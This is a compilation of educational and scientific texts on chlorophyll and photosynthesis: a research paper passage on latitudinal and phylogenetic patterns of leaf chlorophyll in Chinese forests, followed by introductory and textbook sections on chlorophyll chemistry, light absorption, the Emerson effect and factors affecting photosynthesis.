We tested the significance of the phylogenetic signal by comparing the observed value to a null model without phylogenetic structure. If the observed phylogenetic signal in a trait was greater than that in 95% of the null-model randomizations (P < 0.05), the phylogenetic signal was considered significant, and vice versa. The phylogenetic signal was quantified and tested using the "picante" package in R. Results Figure 1. Statistics of leaf chlorophyll content for the nine study forests along the North-South Transect of Eastern China (NSTEC). Panels (A–D) show Chl a, Chl b, Chl a+b, and Chl a/b, respectively. The black lines across the boxes are median values and red points represent the means. HZ, Huzhong; LS, Liangshui; CB, Changbai; DL, Dongling; TY, Taiyue; SN, Shennongjia; JL, Jiulian; DH, Dinghu; JF, Jianfengling. Numbers in brackets represent the number of sampled species at each site. The same letters denote no significant difference among the nine sites (P < 0.05). Table 1. Statistics of leaf chlorophyll content (mg g−1) for different life forms in forests. Table 2. Statistics of leaf chlorophyll content (mg g−1) for different growth forms in forests. Table 3. Statistics of leaf chlorophyll content (mg g−1) for different leaf shapes in forests. To quantify the variance associated with different groupings (sites, life forms), the proportions of variance explained within groups and among groups were calculated. The variance of Chl a, Chl b, Chl a+b, and Chl a/b was mainly explained by within-site variation, with only a small portion arising from among-site variation (Figure 2A). Similar results were obtained when plants were grouped by life form, growth form, and leaf type (Figures 2B–D). Chl a, Chl b, and Chl a+b increased with increasing latitude; however, this trend was weak (all P's < 0.01, R2 = 0.02) (Figures 3A–C). In comparison, there was no obvious latitudinal pattern in Chl a/b (Figure 3D). The contents of Chl a, Chl b, and Chl a+b in leaves were negatively correlated with MAT and MAP (all P's < 0.01), and no significant relationships between Chl a/b and either MAT or MAP were observed (Figures S2, S3). Figure 2. Partitioning of the total spatial variance of leaf chlorophyll content among the nine forests (A), different life forms (B), different growth forms (C), and different leaf shapes (D). Significant phylogenetic signals were observed for Chl a within life forms, within communities, and across the whole transect, except for shrubs and conifer trees (Table 4), but the K-values were approximately equal to 0. Significant phylogenetic signals were observed for Chl b within life forms and communities, and across the whole transect, except for shrubs and conifer trees; the K-values were again approximately equal to 0. There were no significant phylogenetic signals in Chl a/b (Table 4). Across the different sites, there were no significant phylogenetic signals in Chl a+b at most sites (Table 5). Significant phylogenetic signals were observed for Chl a+b at some sites; however, all K-values were approximately equal to 0. In other words, the phylogenetic signals were too weak to matter for Chl a, Chl b, Chl a+b, and Chl a/b (Figures S4, S5). Table 4. Strength of the phylogenetic signal in chlorophyll traits for different growth forms. Table 5. Strength of the phylogenetic signal in chlorophyll traits for each of the nine forests. Across all species, Chl a was negatively correlated with MAT and MAP (P's < 0.01) and positively correlated with SOC, STN, and STP (P's < 0.01).
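As a rough illustration of the within- versus among-group variance partitioning reported above, the sketch below computes the among-group share of the total sum of squares from a one-way ANOVA decomposition. The site means, sample sizes, and random scatter are synthetic stand-ins, not the study's data.

```python
import numpy as np

def among_group_share(groups):
    """Fraction of total variance (sum of squares) explained among groups,
    i.e. SS_between / SS_total from a one-way ANOVA decomposition."""
    all_vals = np.concatenate(groups)
    grand_mean = all_vals.mean()
    ss_total = ((all_vals - grand_mean) ** 2).sum()
    ss_between = sum(len(g) * (g.mean() - grand_mean) ** 2 for g in groups)
    return ss_between / ss_total

# Synthetic Chl a+b values (mg g-1) for three hypothetical sites.
rng = np.random.default_rng(0)
sites = [rng.normal(loc=m, scale=0.8, size=40) for m in (2.0, 2.1, 2.3)]
share = among_group_share(sites)
print(f"among-site: {share:.1%}, within-site: {1 - share:.1%}")
```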
Chl b and Chl a+b were negatively correlated with MAT and MAP (P's < 0.01), and positively correlated with SOC, STN, and STP. Chl a/b was negatively correlated with SOC and STP (Table S3). Environmental factors affected the Chl of PFGs and leaf types differently (Tables S4–S6), but overall they had weak influences on Chl a, Chl b, Chl a+b, and Chl a/b. Furthermore, more than 80% of the total variation in Chl a, Chl b, and Chl a+b could be explained by interspecific variation within the different life forms and forest communities, except for shrubs and conifer trees; for conifer trees, interspecific variation explained about 45% of the variation in these Chl parameters. The contributions of climate and soil factors to the total variance of Chl along the transect were very low, less than 1% for all parameters (Table S7). Discussion Significant Differences in Chl Among Different Species, Life Forms, and Communities Large variation in Chl was observed among the 823 plant species in the natural forest communities. Across all plants, there were significant differences in Chl among different species, life forms, and communities. The coefficients of variation of Chl a, Chl b, Chl a+b, and Chl a/b were 0.41, 0.43, 0.41, and 0.14, respectively. The coefficient of variation of Chl a/b was therefore considerably smaller than those of Chl a, Chl b, and Chl a+b. Although interspecific differences in Chl a and Chl b were very large, there is a strong linear relationship between Chl a and Chl b (Li et al., 2018), which lowers the variability of Chl a/b. Furthermore, the coefficients of variation of Chl a, Chl b, and Chl a+b were also large. Less than 10% of the total variation was among groups when all species were divided into groups by site, life form, and leaf type; for Chl a/b in particular, the among-group share of the total variation was close to zero. Interspecific variation explained more than 80% of the total variation in Chl, which further confirms the dominance of interspecific variation in Chl. Weak Increasing Latitudinal Pattern of Chl in Natural Forests Although there were significant latitudinal patterns for Chl a, Chl b, and Chl a+b, the R2 values were very small, and Chl a/b had no significant latitudinal pattern. The correlations between Chl contents and both MAT and MAP were weak. This phenomenon might be explained by a large amount of Chl in forest communities being redundant: some of the plant chlorophyll is not involved in the photosynthetic reaction. Therefore, chlorophyll content is not necessarily linked to this reaction, even though temperature and water are important factors in the synthesis of chlorophyll. Alternatively, high interspecific variation might have led to the weak latitudinal pattern in our study, with the highest coefficient of variation of Chl reaching 0.52. This interspecific variation could not be explained by environmental differences at the scale of the study, which is consistent with the observed weak latitudinal patterns. Furthermore, chlorophyll content might be affected by community structure, because shading within the vertical canopy structure might change Chl. Some controlled experiments have found that shading can affect plant Chl content, and Chl a/b may also decrease. With the development of molecular clock theory (the assumed constancy of the rate of molecular evolution) and fossil dating data, researchers have found that phylogenetic history plays a decisive role for some plant traits (Comas et al., 2014; Kong et al., 2014; Li et al., 2015).
Some plant traits (e.g., N and P content and calorific values) are strongly affected by the phylogeny of plant species (Stock and Verboom, 2012; Chen et al., 2013; Song et al., 2016). In contrast, in our study, although Chl across all species and within different life forms showed significant phylogenetic signals, the K values were close to zero. Theoretically, a trait is deemed to have a strong phylogenetic signal if its K value is > 1. Previous studies have demonstrated that if a plant trait has a significant phylogenetic signal, it can be considered a conservative trait, and that traits are more similar when the genetic relationship between species is closer (Felsenstein, 1985), and vice versa. Therefore, our results show that Chl is hardly influenced by phylogeny in forests at a large scale. In theory, as an important photosynthetic pigment of plants, Chl is widely influenced by the environment. Unexpectedly, our results showed that both climate and soil factors had very small influences on Chl, while interspecific variation was the main factor influencing the spatial patterns of Chl from tropical to cold-temperate forests. Through the redundancy analysis, we found that climate and soil factors were not the main factors influencing Chl, because their independent effects were less than 1%, whereas interspecific variation explained more than 80% of the variation in Chl. Thus, our results only partly support the idea that plants adapt to the environment by adjusting Chl: because of the small plasticity of Chl, the variability of Chl within a single species has a certain threshold, and above this threshold some plants would be replaced by others because of environmental filtering. This hypothesis requires verification in natural forests in the future. Some studies have demonstrated that the variability of leaf traits is influenced by a combination of species, climate, and soil factors (Reich et al., 2007; Han et al., 2011; Liu et al., 2012). At a large scale, the patterns of leaf traits are not obvious along the changing environmental gradient, with greater variability occurring among coexisting species (Freschet et al., 2011; Onoda et al., 2011; Moles et al., 2014). Twenty percent of the spatial variation in leaf economic traits (specific leaf area, leaf longevity, photosynthetic rate, and leaf N and P content) is associated with the coexistence of different plant species (Wright et al., 2004; Freschet et al., 2011). Furthermore, previous controlled experiments showed that Chl is significantly associated with temperature and moisture (Yamane et al., 2000; Yin et al., 2006). However, the environmental factors used in this study were only MAT and MAP; obtaining concurrent measurements of chlorophyll, temperature, and precipitation would be an interesting direction for future work. For the relationship between Chl and soil nutrients, we found that soils explain a small portion of the total variation, because important elements are prioritized for important organs. Because Chl is such an important photosynthetic pigment, leaves may receive nutrient elements for Chl preferentially, so even a low nutrient content in soils has only a small effect on Chl. Therefore, future research should focus on understanding how soils and climate influence or optimize ecosystem functioning through element allocation. In addition, light is an important factor for chlorophyll synthesis; however, light was not taken into account in our analyses.
To our knowledge, radiation can be estimated from satellite data, and light extinction within forest canopies can be modeled; these would be potential next steps for our research. Chl Should Be Used Cautiously as a Proxy for Simulating GPP in Natural Communities The main purpose of most studies on Chl in natural communities has been to establish a link between Chl and ecosystem functioning, because Chl is widely considered an important factor influencing leaf photosynthetic capacity (Singsaas et al., 2004). Using four deciduous tree species sampled across three growing seasons, Croft et al. (2017) showed that, compared with leaf N content, Chl serves as a better proxy for leaf photosynthetic capacity. Furthermore, Chl can be modeled accurately from remotely sensed data (Croft et al., 2013); thus, this important parameter has been used to model leaf photosynthetic capacity at the global scale (Jacquemoud and Baret, 1990). However, our results showed that significant differences in Chl occur among coexisting species, functional groups, and communities. Furthermore, the vertical structure of the plant community generates strong variation in the light environment, which might result in the accumulation of redundant Chl. In addition, our previous studies have also found that Chl shows only a weak correlation with GPP in these communities (Li et al., 2018). Therefore, the photosynthetic capacity of a given natural forest community could be overestimated by using Chl. In other words, when using Chl as a proxy for GPP in natural communities, the outputs should be treated with caution. While it is a clever concept to optimize models using Chl data derived through remote sensing technology, more research is required to link Chl and GPP in natural communities in a way that is both representative and informative. Conclusions Significant variation in Chl was observed among different plant species, functional groups, and communities. Unexpectedly, Chl showed a very weak latitudinal pattern from tropical monsoon forests to cold-temperate coniferous forests, because of the significant variation among coexisting species. This interspecific variation, rather than soil and climate, was the main factor affecting Chl. Because of this "fuzzy regulation" of Chl in natural communities, caution should be taken when integrating Chl into ecological models. In conclusion, this approach should only be used once scientists are able to link Chl with ecosystem functioning in natural forest communities objectively in future studies. Author Contributions NH and JH conceived the ideas and designed the methodology; YL, LX, CL, JZ, QW, XZ, and XW collected the data; NH and YL analyzed the data; YL, NH, and JH led the writing of the manuscript. All authors contributed critically to the drafts and gave final approval for publication. Conflict of Interest Statement The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest. Acknowledgments This work was supported by the National Key Research Project of China (2017YFC0504004, 2016YFC0500202), the National Natural Science Foundation of China (31000263, 611606015, 31290221), the STS program of the Chinese Academy of Sciences (KFJ-SW-STS-167), and the Youth Innovation Research Team Project (LENOM2016Q0005).
Supplementary Material

References

Felsenstein, J. (1985). Phylogenies and the comparative method. Am. Nat. 125, 1–15. doi: 10.1086/284325

Mackinney, G. (1941). Absorption of light by chlorophyll solutions. J. Biol. Chem. 140, 315–322.

Making Food What is photosynthesis? Photosynthesis is the process by which plants make food from light, water, nutrients, and carbon dioxide. What is chlorophyll? Chlorophyll is the green pigment, or color, found in plants that helps the plant make food. Plants are very important to us. All food people eat comes directly or indirectly from plants. Directly from plants: for example, apples come from an apple tree, and the flour used to make bread comes from a wheat plant. Indirectly from plants: steak comes from a cow, and we all know that cows are animals, not plants, right? But what does the cow eat? It eats grass and grains—PLANTS! So all the foods we eat come from plants. But what do plants eat? They make their own food! What Do Plants Need to Make Food? Plants need several things to make their own food. They need: • chlorophyll, a green pigment found in the leaves of plants • light (either natural sunlight or artificial light, like from a light bulb) • carbon dioxide (CO2) (a gas found in the air; one of the gases people and animals breathe out when they exhale) • water (which the plant collects through its roots) • nutrients and minerals (which the plant collects from the soil through its roots) Plants make food in their leaves. The leaves contain a pigment called chlorophyll, which colors the leaves green. Chlorophyll can make food the plant can use from carbon dioxide, water, nutrients, and energy from sunlight.
This process is called photosynthesis. During the process of photosynthesis, plants release oxygen into the air. People and animals need oxygen to breathe. Copyright © 2009 Missouri Botanical Garden. Chlorophyll is responsible for the lush green hues of many plants. Why do some plants appear green? Green plants are green because they contain a pigment called chlorophyll. Chlorophyll absorbs certain wavelengths of light within the visible light spectrum. As shown in detail in the absorption spectra, chlorophyll absorbs light in the red (long wavelength) and the blue (short wavelength) regions of the visible light spectrum. Green light is not absorbed but reflected, making the plant appear green. Chlorophyll is found in the chloroplasts of plants. There are various types of chlorophyll structures, but plants contain chlorophyll a and b. These two types of chlorophyll differ only slightly, in the composition of a single side chain. Absorption spectra showing how the different side chains in chlorophyll a and chlorophyll b result in slightly different absorptions of visible light. Light with a wavelength of 460 nm is not significantly absorbed by chlorophyll a, but will instead be captured by chlorophyll b, which absorbs strongly at that wavelength. The two kinds of chlorophyll in plants complement each other in absorbing sunlight. Plants are able to satisfy their energy requirements by absorbing light from the blue and red parts of the spectrum. However, there is still a large spectral region between 500 and 600 nm where chlorophyll absorbs very little light, and plants appear green because this light is reflected. What is chlorophyll? Chlorophyll is a compound that is known as a chelate. A chelate consists of a central metal ion bonded to a large organic molecule, composed of carbon, hydrogen, and other elements such as oxygen and nitrogen. Chlorophyll has magnesium as its central metal ion, and the large organic molecule to which it bonds is known as a porphyrin. The porphyrin contains four nitrogen atoms bonded to the magnesium ion in a square planar arrangement. Chlorophyll occurs in a variety of forms. The structure of chlorophyll a. Chlorophyll does not contain chlorine as the name might suggest; the chloro- portion stems from the Greek chloros, which means yellowish green. The element chlorine derives its name from the same source, being a yellowish-green gas. How do birds and animals see plants? Vegetation will not appear to animals as it does to us. Although our color perception is the most advanced amongst mammals, humans have less effective color vision than many birds, reptiles, insects and even fish. Humans are trichromats, sensitive to three fundamental wavelengths of visible light. Our brains interpret color depending on the ratio of red, green and blue light. Some insects are able to see ultraviolet light. Birds are tetrachromatic, able to distinguish four basic wavelengths of light, sometimes ranging into ultraviolet wavelengths, giving them a far more sensitive color perception. It is hard for us to imagine how the world appears to birds, but they will certainly be able to distinguish more hues of green than we do, and so are far more able to distinguish between types of plants. We can speculate that this is of great benefit when choosing where to feed, take shelter and rear young.
Aquatic creatures, from fish to the hyperspectral mantis shrimp (which distinguishes up to twelve distinct wavelengths of light), are uniquely tuned to the colors of their environment. The pages on animals include more information on the variety of color vision in the animal kingdom. The vivid colors of fall leaves emerge as yellow and red pigments, usually masked by chlorophyll, are revealed by its absence. Chlorophyll decomposes in bright sunlight, and plants constantly synthesize chlorophyll to replenish it. In the fall, as part of their preparation for winter, deciduous plants stop producing chlorophyll. Our eyes are tuned to distinguish the changing colors of the plants, which provide us with information such as when fruits are ripe and when the seasons are starting to change. Apart from coloring, has chlorophyll any other role? The green color of chlorophyll is secondary to its importance in nature as one of the most fundamentally useful chelates. It channels the energy of sunlight into chemical energy, converting it through the process of photosynthesis. In photosynthesis, chlorophyll absorbs energy to transform carbon dioxide and water into carbohydrates and oxygen. This is the process that converts solar energy to a form that can be utilized by plants, and by the animals that eat them, to form the foundation of the food chain. Chlorophyll is a molecule that traps light – and is called a photoreceptor. Photosynthesis Photosynthesis is the reaction that takes place between carbon dioxide and water, catalysed by sunlight, to produce glucose and a waste product, oxygen. The overall chemical equation is: 6CO2 + 6H2O → C6H12O6 + 6O2. Glucose can be used immediately to provide energy for metabolism or growth, or stored for use later by being converted to a starch polymer. The by-product oxygen is released into the air, and breathed in by plants and animals during respiration. Plants perform a vital role in replenishing the oxygen level in the atmosphere. In photosynthesis, electrons are transferred from water to carbon dioxide in a reduction process. Chlorophyll assists in this process by trapping solar energy. When chlorophyll absorbs energy from sunlight, an electron in the chlorophyll molecule is excited from a lower to a higher energy state. The excited electron is more easily transferred to another molecule. A chain of electron-transfer steps follows, ending when an electron is transferred to a carbon dioxide molecule. The original chlorophyll molecule is able to accept a new electron from another molecule. This ends a process that began with the removal of an electron from a water molecule. The oxidation-reduction reaction between carbon dioxide and water known as photosynthesis relies on the aid of chlorophyll. There are actually several types of chlorophyll, but all land plants contain chlorophyll a and b. These two types of chlorophyll are identical in composition apart from one side chain, which is a -CH3 group in chlorophyll a and a -CHO group in chlorophyll b. Both consist of a very stable network of alternating single and double bonds, a structure that allows the orbitals to delocalize, making them excellent photoreceptors. The delocalized polyenes have very strong absorption bands in the visible light spectrum, making them ideal for the absorption of solar energy. The chlorophyll molecule is highly effective in absorbing sunlight, but in order to synthesize carbohydrates most efficiently, it needs to be attached to the backbone of a complex protein.
This protein provides exactly the required orientation of the chlorophyll molecules, keeping them in the optimal position that enables them to react efficiently with nearby CO2 and H2O molecules. In photosynthetic bacteria, for example, a photoreceptor protein forms the backbone for a number of chlorophyll molecules. The basic structure seen in the chlorophyll molecule recurs in a number of molecules that assist in biochemical oxidation-reduction reactions, because it is ideally suited to promote electron transfer. Heme consists of a porphyrin similar to that in chlorophyll with an iron(II) ion at its center. Heme is bright red, the pigment that characterizes red blood. In the red blood cells of vertebrates, heme is bound to proteins to form hemoglobin. Oxygen enters the bloodstream in the lungs, gills or other respiratory surfaces and combines with hemoglobin. This oxygen is carried round the body of the organism in the bloodstream and released in the tissues. The related oxygen-binding protein in muscle cells is known as myoglobin, a form that enables the organism to store oxygen, ready for energy-releasing oxidation-reduction reactions. Commercial pigments Chlorophyll is a pigment that produces a green colour, and as a green dye it has been used commercially in processed foods, toothpaste, soaps and cosmetics. Commercial pigments with structures similar to chlorophyll have been produced in a range of colors. In some, the porphyrin is modified, for example by replacing the chlorine atoms with hydrogen atoms. In others, different metal ions may be present. Phthalocyanine is a popular bright blue pigment with a copper ion at the center of the porphyrin. Green plants have the ability to make their own food. They do this through a process called photosynthesis, which uses a green pigment called chlorophyll. A pigment is a molecule that has a particular color and can absorb light at different wavelengths, depending on the color. There are many different types of pigments in nature, but chlorophyll is unique in its ability to enable plants to absorb the energy they need to build tissues. Chlorophyll is located in a plant's chloroplasts, which are tiny structures in a plant's cells. This is where photosynthesis takes place. Phytoplankton, the microscopic floating plants that form the basis of the entire marine food web, contain chlorophyll, which is why high phytoplankton concentrations can make water look green. Chlorophyll's job in a plant is to absorb light—usually sunlight. The energy absorbed from light is transferred to two kinds of energy-storing molecules. Through photosynthesis, the plant uses the stored energy to convert carbon dioxide (absorbed from the air) and water into glucose, a type of sugar. Plants use glucose together with nutrients taken from the soil to make new leaves and other plant parts. The process of photosynthesis produces oxygen, which is released by the plant into the air. Chlorophyll gives plants their green color because it does not absorb the green wavelengths of white light. That particular light wavelength is reflected from the plant, so it appears green. Plants that use photosynthesis to make their own food are called autotrophs. Animals that eat plants or other animals are called heterotrophs. Because food webs in every type of ecosystem, from terrestrial to marine, begin with photosynthesis, chlorophyll can be considered a foundation for all life on Earth.
Objective Role of the colour of light during photosynthesis Did you know that the colour of light plays an important role during photosynthesis? Yes, it does. Plants use only certain colours from light for the process of photosynthesis. The chlorophyll absorbs blue, red and violet light rays. Photosynthesis occurs more in blue and red light rays and less, or not at all, in green light rays. The light that is absorbed the best is blue, so this shows the highest rate of photosynthesis, after which comes red light. Green light cannot be absorbed by the plant, and thus cannot be used for photosynthesis. Chlorophyll looks green because it absorbs red and blue light, making these colours unavailable to be seen by our eyes. It is the green light which is not absorbed that finally reaches our eyes, making the chlorophyll appear green. Factors affecting Photosynthesis For a constant rate of photosynthesis, various factors are needed at an optimum level. Here are some of the factors affecting photosynthesis. • Light Intensity: An increased light intensity leads to a high rate of photosynthesis, and a low light intensity means a low rate of photosynthesis. • Concentration of CO2: A higher carbon dioxide concentration increases the rate of photosynthesis. Normally a carbon dioxide concentration of 0.03 to 0.04 percent is sufficient for photosynthesis. • Temperature: Efficient photosynthesis requires an optimum temperature range of about 25 to 35°C. • Water: Water is an essential factor for photosynthesis. A lack of water also leads to a problem with carbon dioxide intake: if water is scarce, the leaves keep their stomata closed to retain the water they have stored. • Polluted Atmosphere: Pollutants and gases (impure carbon) settle on leaves and block the stomata, making it difficult to take in carbon dioxide. A polluted atmosphere can lead to a 15 percent decrease in the rate of photosynthesis. Learning Outcomes • Students understand the concept that light is necessary for photosynthesis. • Students understand the principle of photosynthesis and the factors affecting photosynthesis. • Students will be able to do the experiment more accurately in the real lab once they understand the steps through the animation and simulation. Light has a particulate nature and a wave nature. Light represents that part of the radiant energy having wavelengths visible to the naked eye, approximately 390 to 760 nm. This is a very narrow region of the electromagnetic spectrum. The particulate nature of light is usually expressed in statements that light comes in quanta or photons, discrete packets of energy, each having a specific associated wavelength. In other words, light can be defined as electromagnetic energy propagated in discrete corpuscles called quanta or photons. The energetics of chemical reactions are usually described in terms of kilocalories per mole of the chemicals involved (1 mole = 6.02 × 10^23 molecules). Therefore, light energies are usually described in terms of kilocalories per mole of quanta, or per einstein (1 mole of quanta = 1 einstein = 6.02 × 10^23 quanta). The colour of the light is determined by the wavelength (λ) of the light radiation.
At any given wavelength, all the quanta have the same energy. The energy (E) of a quantum is inversely proportional to its wavelength. Thus the violet and blue wavelengths are more energetic than the longer orange and red ones. Therefore, the energy of blue light (λ = 420 nm) is of the order of 70 kcal/einstein and that of red light (λ = 690 nm) about 40 kcal/einstein. The symbol commonly used for a quantum, hν, is derived from this relationship. In any wave propagation, the frequency (ν) is inversely proportional to the wavelength. Since E ∝ 1/λ and ν ∝ 1/λ, it follows that E ∝ ν. Planck's constant (h) converts this into the equation E = hν. Thus hν, used to designate a quantum, refers to the energy content of the quantum. A fundamental principle of light absorption, often called the Einstein law, is that any pigment (coloured molecule) can absorb only one photon at a time and that this photon causes the excitation of one electron. Specific valence (bonding) electrons in stable ground-state orbitals are then usually excited, and each electron can be driven away from the positively charged nucleus for a distance corresponding to an energy exactly equal to the energy of the photon absorbed (Fig. 5-10). The pigment molecule is then in an excited state, and it is this excitation energy that is used in photosynthesis. The relationship between the energies of light, expressed both as kilocalories per mole of quanta (per einstein) and as E′0 values, and the energies required to drive certain reactions is shown in Table 5-2. It is evident that the energy of a red quantum is just sufficient to raise an electron from OH− to the reducing level of H2; a UV quantum contains nearly twice this amount of energy. Thus, there is enough energy in a quantum of light (barely enough in a red quantum) to split water. EMERSON EFFECT From experiments, it appears that the high energy of blue light absorbed by chlorophyll is not used efficiently. The basic requirement is for a certain number of quanta. Therefore, the energy of the quanta is unimportant provided they can be absorbed by the chlorophyll. Red quanta (40 kcal/einstein) are as effective as blue quanta (70 kcal/einstein); the extra energy of the blue quanta is wasted. Presumably, if a quantum is of the appropriate wavelength to be absorbed, it will be effective. However, an important exception to this behavior is the so-called red drop, a decided decrease in efficiency found in many organisms at the far-red end of the absorption spectrum, usually over 685 nm. Emerson, working with an algal system, found that two pigment systems and two light reactions participate in photosynthesis. When the system was exposed to wavelengths longer than 680 nm alone, a certain rate of photosynthesis was observed; likewise, exposure to wavelengths shorter than 680 nm alone had only a limited effect on photosynthesis. However, when the system was exposed to light of both wavelengths at the same time, the effect on photosynthesis exceeded the sum of the two effects caused separately. Thus Emerson concluded that the efficiency of red light at a wavelength of about 700 nm could be increased by adding shorter-wavelength light (650 nm). This showed that the rate of photosynthesis in light of the two wavelengths together was greater than the sum of the rates of photosynthesis in either alone. This is known as the Emerson effect, after its discoverer. It provided evidence that the two pigment systems work in cooperation with each other; the resultant increase in photosynthesis is due to this synergism (Fig. 5-13).
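The quoted figures of roughly 70 kcal/einstein for blue light and 40 kcal/einstein for red light follow directly from E = hc/λ scaled up by Avogadro's number. A minimal Python sketch of that conversion, using standard physical constants and the 420 nm and 690 nm wavelengths mentioned above:

```python
# Energy per einstein (one mole of photons) from the wavelength: E = N_A * h * c / lambda.
H = 6.626e-34        # Planck's constant, J s
C = 2.998e8          # speed of light, m/s
N_A = 6.022e23       # Avogadro's number, 1/mol
J_PER_KCAL = 4184.0  # joules per kilocalorie

def kcal_per_einstein(wavelength_nm):
    energy_per_photon = H * C / (wavelength_nm * 1e-9)   # joules per photon
    return energy_per_photon * N_A / J_PER_KCAL

for nm in (420, 690):
    print(f"{nm} nm -> {kcal_per_einstein(nm):.0f} kcal/einstein")
# Prints roughly 68 kcal/einstein for 420 nm (blue) and 41 for 690 nm (red).
```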
FACTORS AFFECTING PHOTOSYNTHESIS Several external and internal factors influence photosynthesis. Of the external factors influencing photosynthesis, light quality and intensity, CO2 concentration, temperature, oxygen, water availability, wind speed and nutrient level are the most important. The internal factors include chlorophyll content, stomatal behaviour, leaf water content and enzymes. The morphology of the plant also influences photosynthesis. Most of the internal factors are influenced by the external factors. However, several of these interact to influence the rate of photosynthesis. For instance, an increase in CO2 concentration enhances photosynthesis, but such an increase may also cause closure of stomata, so that no net increase in photosynthetic rate is observed. In summary, no single factor should be considered in isolation to explain an increase in photosynthesis. Certain specific factors that affect photosynthetic pathways are briefly discussed below. Temperature As described earlier, Blackman was the first to recognize the interrelations between light intensity and temperature. When CO2, light and other factors are not limiting, the rate of photosynthesis increases with a rise in temperature within the physiological range of about 5-35°C. Between 25-30°C photosynthesis usually has a Q10 of about 2. Certain organisms can continue CO2 fixation at extraordinary extremes of temperature: some conifers at -20°C, and algae that inhabit hot springs at temperatures in excess of 50°C. But in most plants, photosynthesis ceases or declines sharply beyond the physiological limit, because above 40°C there is an abrupt fall in the rate and the tissues die. High temperatures cause inactivation of enzymes, thus affecting the enzymatically controlled dark reactions of photosynthesis. The temperature range at which optimum photosynthesis can occur varies with the plant species; e.g., some lichens can photosynthesize at 20°C while conifers can assimilate at 35°C. In nature the maximum rate of photosynthesis allowed by temperature is not realized because light or CO2 or both are limiting. The response curve of net photosynthesis to temperature is different from those of light and CO2. It shows minimum, optimum and maximum temperatures. Between the C3 and C4 plants, the former species have optimal rates from 20-25°C while the latter from 35-40°C. Similarly, temperature also influences light respiration (optimum at 30-35°C) and dark respiration (optimum at 40-45°C). Oxygen Oxygen affects photosynthesis in several ways. Certain of the photosynthetic electron carriers may transfer electrons to oxygen, and ferredoxin in particular appears to be sensitive to O2. In bright light, high oxygen leads to irreversible damage to the photosynthetic system, probably by the oxidation of pigments. Carotenes in chloroplasts tend to protect chlorophylls from damage by solarization. The reaction of RuBP carboxylase (RuBPcase) provides the most important site of the O2 effect on photosynthesis. Oxygen competitively and reversibly inhibits the photosynthesis of C3 plants over all concentrations of CO2; at high O2 (80% or over) irreversible inhibition also takes place. On the other hand, C4 plants do not release CO2 in photorespiration; therefore, photosynthesis in them is not affected until very high O2 concentrations are reached, which cause irreversible damage to the photosynthetic system (Fig. 5-23). Carbon dioxide concentrations Under field conditions, CO2 concentration is frequently the limiting factor in photosynthesis.
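The Q10 of about 2 quoted for the 25-30°C range has a simple quantitative reading: the rate roughly doubles for every 10°C rise within the favourable range. A minimal sketch of that rule, with an invented reference rate purely for illustration:

```python
def rate_at_temperature(rate_ref, t_ref, t, q10=2.0):
    """Scale a reaction rate from t_ref to t using the Q10 rule:
    rate(t) = rate_ref * q10 ** ((t - t_ref) / 10)."""
    return rate_ref * q10 ** ((t - t_ref) / 10.0)

# Hypothetical net photosynthesis of 10 (arbitrary units) at 20 degrees C.
for t in (20, 25, 30):
    print(t, round(rate_at_temperature(10.0, 20.0, t), 1))
# 20 -> 10.0, 25 -> ~14.1, 30 -> 20.0 (doubled over a 10 degree rise)
```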
The atmospheric concentration of about 0.033% (330 ppm) is well below CO2 saturation for most plants. Some do not saturate until a concentration of 10 to 100 times this is reached. Characteristic CO2 saturation curves are shown in Fig. 5-24. Photosynthesis is much affected by CO2 at low concentrations but is more closely related to light intensity at higher concentrations. At reduced CO2 concentrations the path of carbon may change dramatically, because glycolate production results from the increased relative level of O2. As the CO2 concentration is reduced, the rate of photosynthesis slows until it is exactly equal to the rate of photorespiration. This CO2 concentration, at which CO2 uptake and output are equal, is called the CO2 compensation point. The CO2 compensation point of C4 plants, which do not release CO2 in photorespiration, is usually very low (from about 2-5 ppm CO2). Light The photosynthetically active spectrum of light is between 400-700 nm. Green light (550 nm) plays no important role in photosynthesis. Light supplies the energy for the process and varies in intensity, quality and duration. Intensity When CO2 and temperature are not limiting and light intensities are low, the rate of photosynthesis increases with an increase in light intensity. At a certain point saturation may be reached, when a further increase in light intensity fails to induce any increase in photosynthesis. Optimum or saturation intensities may vary with different plant species, e.g. C3 and C4 plants: the former become saturated at levels considerably lower than full sunlight but the latter are usually not saturated even at full sunlight. When the intensity of light falling on a photosynthesizing organ is increased beyond a certain point, the cells of that organ become vulnerable to chlorophyll-catalyzed photooxidation. Consequently these organs begin to consume O2 instead of CO2, and CO2 is released. Photooxidation is maximal when O2 is present, or carotenoids are absent, or the CO2 concentration is low. Duration Generally a plant will accomplish more photosynthesis when exposed to long periods of light. Uninterrupted and continuous photosynthesis for relatively long periods of time may be sustained without any visible damage to the plant. If the light source is removed, the rate of CO2 fixation falls to zero immediately. The light compensation point is the light intensity at which photosynthesis equals respiration and no net gas exchange occurs. The light compensation point of shade-tolerant plants is much lower than that of sun plants. Water Water is an essential raw material in carbon assimilation. Less than 1% of the water absorbed by a plant is used in photosynthesis. Thus, a decrease in soil water from field capacity to the permanent wilting percentage (PWP) results in decreased photosynthesis. The inhibitory effect is primarily due to dehydration of the protoplasm and also closure of stomata. The removal of water from the protoplasm also affects its colloidal state, impairs enzymatic efficiency, and inhibits vital processes like respiration and photosynthesis. The synthesis of organic compounds from carbon dioxide and water (with the release of oxygen), using light energy absorbed by chlorophyll, is called photosynthesis.
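Both compensation points described in this passage are simply the input levels at which gross photosynthesis balances the losses. As an illustration only, the sketch below uses a generic rectangular-hyperbola light-response model with made-up parameter values (it is not taken from this text) and locates the light compensation point where net assimilation crosses zero:

```python
import numpy as np

def net_photosynthesis(light, p_max=20.0, k=200.0, respiration=1.5):
    """Toy light-response curve: gross = p_max * I / (I + k), net = gross - respiration.
    All parameter values are invented for illustration."""
    return p_max * light / (light + k) - respiration

# Light compensation point: the intensity where net photosynthesis crosses zero.
light = np.linspace(0.0, 2000.0, 20001)
net = net_photosynthesis(light)
compensation = light[np.argmax(net >= 0.0)]
print(f"light compensation point ~ {compensation:.1f} (same units as light input)")
# Analytically: I_comp = k * R / (p_max - R) = 200 * 1.5 / 18.5 ~ 16.2
```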
